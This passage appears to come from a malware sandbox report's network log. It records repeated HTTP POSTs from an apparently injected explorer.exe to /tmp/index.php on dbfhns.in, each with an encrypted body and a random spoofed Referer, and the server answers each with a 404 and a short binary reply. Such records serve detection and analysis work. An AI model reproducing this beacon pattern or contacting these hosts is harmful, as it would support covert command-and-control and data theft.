                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.449794185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:09.568417072 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://uvunmrjdxhvinab.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 216
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:09.568444014 CEST216OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 70 3f af a2
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vup?\G`[p`o8~XCnLZ?Kb )@ ?G$RS^g-C.(PWKH3ZQ$@
                                                                      May 26, 2024 10:30:10.527471066 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:10 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.449795185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:16.094261885 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://unjbbvgiwfeg.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 198
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:16.094295979 CEST198OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 3f b5 ff
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuS?O&N^hWE9q`toR]rGHa7*1S3}ED@PL:$z*\
                                                                      May 26, 2024 10:30:17.015410900 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:16 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.449796185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:20.795227051 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://krexlrcywwqsrfo.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 203
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:20.795247078 CEST203OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 33 ec 9b
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vug3NLDS5wkLuntY(4zP6..*e-;]7-qKG6-|Dw!
                                                                      May 26, 2024 10:30:21.744414091 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:21 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.449797185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:26.664175034 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://mlqkylljcnp.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 285
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:26.664201975 CEST285OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 0d e8 ad
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuRrKjZ2O9u?>WEA9NOpC @<yh8-nRH']*yj7bEhbfowh,]nZzj!
                                                                      May 26, 2024 10:30:27.631103992 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:27 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.449798185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:32.832952976 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://caefrlsewqoaju.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 305
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:32.832953930 CEST305OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 0a bb eb
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu#jC^tKt<9,+jc)r+x?)/LL9,QBhQ5?58hOYMY!Yu[0|~S`M1p^mD7$
                                                                      May 26, 2024 10:30:33.771975040 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:33 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.449799185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:38.040045977 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://bjcivuphfkkr.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 234
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:38.040066004 CEST234OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 2e ed 9d
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu".b\_e_xsX$8h\77\4M:*W'uo*"Up[eTN;f3QoR*_.&qf`XSk0
                                                                      May 26, 2024 10:30:38.973047018 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.449800185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:42.960078001 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://sdscberxlhps.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 361
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:42.960122108 CEST361OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 2a f9 fa
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu^*%nhE'LXd:+B(xBS].[:_5uI/+&=r]C2<mF0!"k/ TY_cm\x#!>v
                                                                      May 26, 2024 10:30:43.896199942 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:43 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.449801185.18.245.58802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:49.939903975 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://gkjoqsoewca.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 134
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:49.939929008 CEST134OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 1f c0 fe
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuuGKTcKh&Yi8pm-Vd
                                                                      May 26, 2024 10:30:50.878731012 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:50 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.44980231.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:30:57.563988924 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://hhlofuoqneckx.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 193
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:30:57.563998938 CEST193OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 31 ee 9d
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu'1r@U)HJ6*z-UCK%~1E;_O#iBRhj?pM
                                                                      May 26, 2024 10:30:58.361211061 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:30:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.44980331.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:04.070961952 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://nygflvrwjiwigd.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 148
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:04.070996046 CEST148OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 47 a8 99
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu|GiGUEFd=vTNExVbF$2Q0.+A}Wh
                                                                      May 26, 2024 10:31:04.894013882 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.44980431.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:09.242156029 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://iuqvispkjnrqwr.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 347
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:09.242172956 CEST347OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 54 e6 e7
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuzTMB[XJ_8olqgL,f1(9,{[`DAfc*~7PV(XV@-Qj7B@w~|Z3S0
                                                                      May 26, 2024 10:31:10.067325115 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:09 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.44980531.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:14.161207914 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://lnnxnofesovuip.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 115
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:14.161231995 CEST115OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 38 de f3
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuS8ZuDaYvbQVa6b/
                                                                      May 26, 2024 10:31:14.957427979 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:14 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.44980631.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:20.922297001 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://orsrbhepjknkic.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 357
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:20.922297001 CEST357OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 78 00 a4 a3
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vux{jw_7W-}XT2AMYF91OC5XUp:$(3`u0X7(3jKtOU*3F*mBn0vk?oI")
                                                                      May 26, 2024 10:31:21.738017082 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:21 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.44980731.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:25.838072062 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vmhgovbhvgan.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 151
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:25.838072062 CEST151OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 56 1b ec a9
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vuVUxFO+]{svx_PHE@Oag#K;J&H
                                                                      May 26, 2024 10:31:26.629755020 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:26 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.44980831.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:30.908327103 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://geojjabhsye.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 365
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:30.908363104 CEST365OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 29 53 b6 fc
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu)SyBr^fog;Y~m0@hOiG!+>1GDNeD_^~uN?<cvkOb/L!b&DGEv3Uf5r
                                                                      May 26, 2024 10:31:31.731391907 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:31 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.44980931.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:37.250287056 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://mmoytfgyxyxpsi.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 349
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:37.250320911 CEST349OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 04 a2 e3
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu@w9Svgd[7-!AC07u9:"'{?UE4"/>-6NBSY(Ib3#&I&KwtDi9Pu
                                                                      May 26, 2024 10:31:38.073501110 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:37 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.44981031.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:42.029567957 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://njscijpdcohnar.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 205
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:42.029599905 CEST205OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 0d f3 94
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu;IVa},O|+6A|>6{~ %,{z\!1HL&T[f]o%F[T-1'
                                                                      May 26, 2024 10:31:42.835387945 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:42 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      34192.168.2.44981131.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:46.916707993 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://tssxxpdwgkaqunjd.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 294
                                                                      Host: dbfhns.in
